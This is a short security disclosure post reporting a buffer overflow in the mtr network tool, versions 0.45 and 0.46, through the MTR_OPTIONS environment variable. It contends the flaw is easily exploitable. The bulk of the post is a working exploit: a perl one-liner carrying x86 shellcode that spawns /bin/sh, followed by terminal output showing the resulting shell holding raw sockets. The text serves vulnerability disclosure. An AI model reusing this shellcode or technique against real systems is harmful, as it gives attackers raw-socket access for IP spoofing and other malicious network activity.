mtr 0.45, 0.46

[Przemyslaw Frasunek <venglin () freebsd lublin pl>]

Few days ago, a new version of mtr has been released. Authors wrote
in CHANGELOG, that they fixed a non-exploitable buffer overflow.
In fact, this vulnerability is very easly exploitable and allows
attacker to gain access to raw socket, which makes possible ip spoofing
and other malicious network activity.

The sample exploit is TRIVIAL because of strtok/while loop in vulnerable code.

clitoris:/home/venglin/mtr-0.45> uname -smr
Linux 2.4.8-26mdk i686
clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
clitoris:/home/venglin/mtr-0.45> ./mtr
sh-2.05$

At this point, exec'd shell has a raw socket opened:

clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
sh        17263 venglin    3u   raw                        605400 00000000:00FF->00000000:0000 st=07
sh        17263 venglin    4u   raw                        605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 -> socket:[605400]
lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 -> socket:[605401]
lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 -> /proc/17318/fd

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *